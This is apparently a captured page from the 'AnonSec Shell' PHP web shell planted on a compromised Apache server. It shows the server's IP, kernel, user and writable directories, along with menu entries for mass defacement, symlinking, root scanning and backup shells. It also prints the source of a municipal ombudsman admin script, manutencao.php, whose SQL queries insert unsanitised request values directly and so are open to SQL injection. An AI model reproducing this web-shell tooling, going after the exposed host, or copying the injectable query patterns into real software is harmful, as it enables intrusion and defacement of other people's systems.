AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ouvidoria/cmhorizonte/restrito/sis_secretaria/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/ouvidoria/cmhorizonte/restrito/sis_secretaria/manutencao.php
<?php


    include_once("../inc/autenticar.php");

    //fun��o de valida��o dos dados do formulario do cadastro de usuario -------------------
    function validaDados()
    {
        global $erro;
        global $acao;
        global $idsecretaria;
        global $nome;
        global $sigla;
        global $telefonecontato;
        global $ativado;
        global $emailsic;
        global $siccentral;

        if (empty($nome)) {
            $erro = "Nome não informado.";
            return false;
        } elseif (empty($sigla)) {
            $erro = "Sigla não informada.";
            return false;
        }

        if (empty($ativado)) $ativado = "0";

        if (empty($siccentral)) $siccentral = "0";

        //verifica se ja existe registro cadastrado com a informa�ao passada ---

        if ($acao=="Incluir")
            $sql = "select * from sis_secretaria where sigla = '$sigla'";
        else
            $sql = "select * from sis_secretaria where sigla = '$sigla' and idsecretaria <> $idsecretaria";

        if (mysql_num_rows(execQuery($sql)) > 0) {
            $erro = "Já existe secretaria cadastrada com a sigla informada";
            return false;
        }
        //-----------------------------------------------------------------------

        return true;
    }

    //------------------------------------------------------------------------------------------

    $codigo = $_GET["codigo"];
    $acao   = "Incluir";

    //se for passado codigo para edição e nao tiver sido postado informação do formulario busca dados do banco
    if (!$_POST['Alterar'] and !empty($codigo)) {
        $acao = "Alterar";

        $sql = "select * from sis_secretaria where idsecretaria = $codigo";

        $resultado = execQuery($sql);
        $registro  = mysql_fetch_array($resultado);

        $idsecretaria    = $registro["idsecretaria"];
        $nome            = addslashes($registro["nome"]);
        $sigla           = $registro["sigla"];
        $responsavel     = $registro["responsavel"];
        $telefonecontato = $registro["telefonecontato"];
        $ativado         = $registro["ativado"];
        $emailsic        = $registro["emailsic"];
        $siccentral      = $registro["siccentral"];
    } else {
        //recupera valores do formulario
        $idsecretaria    = $_POST["idsecretaria"];
        $nome            = addslashes($_POST["nome"]);
        $sigla           = $_POST["sigla"];
        $responsavel     = $_POST["responsavel"];
        $telefonecontato = $_POST["telefonecontato"];
        $ativado         = $_POST["ativado"];
        $emailsic        = $_POST["emailsic"];
        $siccentral      = $_POST["siccentral"];
    }

    $erro = "";

    //se for uma inclusao
    if ($_POST['Incluir']) {
        checkPerm("INSSEC");

        if (validaDados()) {
            $sql
                = "INSERT INTO sis_secretaria (nome, sigla, responsavel, telefonecontato, ativado, emailsic, siccentral, idusuarioinclusao, datainclusao )
				  VALUES
				  ('$nome','$sigla','$responsavel','$telefonecontato', $ativado, '$emailsic', $siccentral, " . getSession('uid') . ", NOW())";

            if (execQuery($sql)) {
                logger("Adicionou SIC");
                header("Location: index.php");
            } else {
                $erro = "Ocorreu um erro ao incluir secretaria.";
            }
        }
    } //se for uma altera��o
    elseif ($_POST['Alterar']) {
        $acao = "Alterar";
        checkPerm("UPTSEC");

        if (validaDados()) {
            $sql
                = "update sis_secretaria set
						nome='$nome', 
						sigla='$sigla', 
						responsavel='$responsavel', 
						telefonecontato='$telefonecontato', 
						ativado= $ativado,
                                                emailsic = '$emailsic',
                                                siccentral='$siccentral',
                                                idusuarioalteracao = " . getSession('uid') . ",
                                                dataalteracao = NOW()
				    WHERE idsecretaria ='$idsecretaria' ";

            if (execQuery($sql)) {
                logger("Alterou secretaria");
                header("Location: index.php");
            } else {
                $erro = "Ocorreu um erro ao alterar secretaria.";
            }
        }
    }

?>

Anon7 - 2022
AnonSec Team